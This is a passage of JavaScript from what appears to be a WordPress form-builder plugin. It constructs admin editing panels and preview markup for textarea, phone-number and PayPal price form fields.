			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_size_label);
	
	edit_main_td3_1.appendChild(el_size_w);
	edit_main_td3_1.appendChild(X);
	edit_main_td3_1.appendChild(el_size_h);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');

//show table

	element='textarea';
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_textarea");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
			
	var div = document.createElement('div');
      	div.setAttribute("id", "main_div");
			
		var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	var adding = document.createElement(element);
		if(w_title==w_first_val)
		{
			adding.style.cssText = "width:"+w_size_w+"px; height:"+w_size_h+"px;";
			adding.setAttribute("class", "input_deactive");
		}
		else
		{
			adding.style.cssText = "width:"+w_size_w+"px; height:"+w_size_h+"px;";
			adding.setAttribute("class", "input_active");
		}
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.setAttribute("name", i+"_elementform_id_temp");
		adding.setAttribute("title", w_title);
		adding.setAttribute("value",w_first_val);
		adding.setAttribute("onFocus", "delete_value('"+i+"_elementform_id_temp')");
		adding.setAttribute("onBlur", "return_value('"+i+"_elementform_id_temp')");
		adding.setAttribute("onChange", "change_value('"+i+"_elementform_id_temp')");
		adding.innerHTML=w_first_val;
		
			
		var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
      	td2.appendChild(adding_type);
	
      	td2.appendChild(adding_required);
      	td2.appendChild(adding_unique);
      	td2.appendChild(adding);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function type_phone(i, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_mini_labels, w_required, w_unique, w_class, w_attr_name, w_attr_value) {
	document.getElementById("element_type").value = "type_phone";
	delete_last_child();
  // edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
		
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
		
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			    el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			    el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
				
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
			el_size.setAttribute("id", "edit_for_input_size");
			el_size.setAttribute("type", "text");
			el_size.setAttribute("value", w_size);		
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_element_lastform_id_temp', this.value);");

	var gic = document.createTextNode("-");

	var el_first_value_label = document.createElement('label');
	    el_first_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_area = document.createElement('input');
                el_first_value_area.setAttribute("id", "el_first_value_area");
                el_first_value_area.setAttribute("type", "text");
                el_first_value_area.setAttribute("value", w_title[0]);
                el_first_value_area.style.cssText = "width:50px; margin-right:4px";
                el_first_value_area.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_firstform_id_temp')");

	var el_first_value_phone = document.createElement('input');
                el_first_value_phone.setAttribute("id", "el_first_value_phone");
                el_first_value_phone.setAttribute("type", "text");
                el_first_value_phone.setAttribute("value", w_title[1]);
                el_first_value_phone.style.cssText = "width:100px; margin-left:4px";
                el_first_value_phone.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_lastform_id_temp')");


	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
                el_required.setAttribute("checked", "checked");	

	var el_unique_label = document.createElement('label');
				el_unique_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_send");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("value", "yes");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	            el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
				el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_name')");
				
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
				el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_name')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_name')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_name')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_first_value_label);
	edit_main_td3_1.appendChild(el_first_value_area);
	edit_main_td3_1.appendChild(gic);
	edit_main_td3_1.appendChild(el_first_value_phone);

	edit_main_td7.appendChild(el_size_label);
	edit_main_td7_1.appendChild(el_size);

  edit_main_td4.appendChild(el_style_label);
  edit_main_td4_1.appendChild(el_style_textarea);

	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_name');

//show table

	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_phone");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
	    
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
        var div_for_editable_labels = document.createElement('div');
        div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
      	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");
        div_for_editable_labels.appendChild(edit_labels);

      	var tr = document.createElement('tr');
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var table_name = document.createElement('table');
           	table_name.setAttribute("id", i+"_table_name");
           	table_name.setAttribute("cellpadding", '0');
           	table_name.setAttribute("cellspacing", '0');
			
      	var tr_name1 = document.createElement('tr');
           	tr_name1.setAttribute("id", i+"_tr_name1");
			
      	var tr_name2 = document.createElement('tr');
           	tr_name2.setAttribute("id", i+"_tr_name2");
			
      	var td_name_input1 = document.createElement('td');
           	td_name_input1.setAttribute("id", i+"_td_name_input_first");
			
      	var td_name_input2 = document.createElement('td');
           	td_name_input2.setAttribute("id", i+"_td_name_input_last");
		
      	var td_name_label1 = document.createElement('td');
           	td_name_label1.setAttribute("id", i+"_td_name_label_first");
           	td_name_label1.setAttribute("align", "left");
			
      	var td_name_label2 = document.createElement('td');
           	td_name_label2.setAttribute("id", i+"_td_name_label_last");
           	td_name_label2.setAttribute("align", "left");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      
	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";	
			
	var first = document.createElement('input');
        first.setAttribute("type", 'text');
		
		if(w_title[0]==w_first_val[0])
			first.setAttribute("class", "input_deactive");
		else
			first.setAttribute("class", "input_active");
		
	    first.style.cssText = "width:50px";
	    first.setAttribute("id", i+"_element_firstform_id_temp");
	    first.setAttribute("name", i+"_element_firstform_id_temp");
		first.setAttribute("value", w_first_val[0]);
		first.setAttribute("title", w_title[0]);
		first.setAttribute("onFocus", 'delete_value("'+i+'_element_firstform_id_temp")');
		first.setAttribute("onBlur", 'return_value("'+i+'_element_firstform_id_temp")');
	    first.setAttribute("onChange", "change_value('"+i+"_element_firstform_id_temp')");
		first.setAttribute("onKeyPress", "return check_isnum(event)");
		
	var gic = document.createElement('span');
	    gic.setAttribute("class", "wdform_line");
		gic.style.cssText = "margin: 0px 4px 0px 4px; padding: 0px;";
		gic.innerHTML = "-";	

	var first_label = document.createElement('label');
	    first_label.setAttribute("class", "mini_label");
	    first_label.setAttribute("id", i+"_mini_label_area_code");
	    first_label.innerHTML= w_mini_labels[0];
			
	var last = document.createElement('input');
        last.setAttribute("type", 'text');
		
 		if(w_title[1]==w_first_val[1])
			last.setAttribute("class", "input_deactive");
		else
			last.setAttribute("class", "input_active");
			
	    last.style.cssText = "width:"+w_size+"px";
		last.setAttribute("id", i+"_element_lastform_id_temp");
	   	last.setAttribute("name", i+"_element_lastform_id_temp");
		last.setAttribute("value", w_first_val[1]);
		last.setAttribute("title", w_title[1]);
		last.setAttribute("onFocus", 'delete_value("'+i+'_element_lastform_id_temp")');
		last.setAttribute("onBlur", 'return_value("'+i+'_element_lastform_id_temp")');
		last.setAttribute("onChange", "change_value('"+i+"_element_lastform_id_temp')");
		last.setAttribute("onKeyPress", "return check_isnum(event)");

	var last_label = document.createElement('label');
		last_label.setAttribute("class", "mini_label");
		last_label.setAttribute("id", i+"_mini_label_phone_number");
		last_label.innerHTML=w_mini_labels[1];
			
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
		
      	td_name_input1.appendChild(first);
      	td_name_input1.appendChild(gic);
      	td_name_input2.appendChild(last);
      	tr_name1.appendChild(td_name_input1);
      	tr_name1.appendChild(td_name_input2);
		
      	td_name_label1.appendChild(first_label);
      	td_name_label2.appendChild(last_label);
      	tr_name2.appendChild(td_name_label1);
      	tr_name2.appendChild(td_name_label2);
      	table_name.appendChild(tr_name1);
      	table_name.appendChild(tr_name2);
		
       	td2.appendChild(adding_type);
       	td2.appendChild(adding_required);
       	td2.appendChild(adding_unique);
    	td2.appendChild(table_name);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
        div.appendChild(div_for_editable_labels);
      	main_td.appendChild(div);
		
	if (w_field_label_pos == "top") {
    label_top(i);
  }
  change_class(w_class, i);
  refresh_attr(i, 'type_name');
  jQuery(document).ready(function() {
    jQuery("label#"+i+"_mini_label_area_code").click(function() {
    if (jQuery(this).children('input').length == 0) {
      var area_code = "<input type='text' class='area_code' size='10' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
      jQuery(this).html(area_code);
      jQuery("input.area_code").focus();
      jQuery("input.area_code").blur(function() {
        var value = jQuery(this).val();
        jQuery("#"+i+"_mini_label_area_code").text(value);
        });
      }
    });
    jQuery("label#"+i+"_mini_label_phone_number").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var phone_number = "<input type='text' class='phone_number'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(phone_number);
        jQuery("input.phone_number").focus();
        jQuery("input.phone_number").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_phone_number").text(value);
        });
      }
    });
  });
}

function change_input_range(type, id)
{
	var s='';
	if(document.getElementById('el_range_'+type+'1').value!='')
		s=document.getElementById('el_range_'+type+'1').value;

	if(document.getElementById('el_range_'+type+'2').value!='')
	{
		if(document.getElementById('el_range_'+type+'1').value=='')
			s='0';			

		s=s+'.'+document.getElementById('el_range_'+type+'2').value;
	}
	
	document.getElementById(id+'_range_'+type+'form_id_temp').value=s;
}
function explode( delimiter, string ) {	
	var emptyArray = { 0: '' };

	if ( arguments.length != 2
		|| typeof arguments[0] == 'undefined'
		|| typeof arguments[1] == 'undefined' )
	{
		return null;
	}

	if ( delimiter === ''
		|| delimiter === false
		|| delimiter === null )
	{
		return false;
	}

	if ( typeof delimiter == 'function'
		|| typeof delimiter == 'object'
		|| typeof string == 'function'
		|| typeof string == 'object' )
	{
		return emptyArray;
	}

	if ( delimiter === true ) {
		delimiter = '1';
	}

	return string.toString().split ( delimiter.toString() );
}

function type_paypal_price(i, w_field_label, w_field_label_pos, w_first_val, w_title, w_mini_labels, w_size, w_required, w_hide_cents, w_class, w_attr_name, w_attr_value, w_range_min, w_range_max) {
	document.getElementById("element_type").value="type_paypal_price";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
		
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
		
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px; line-height:20px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
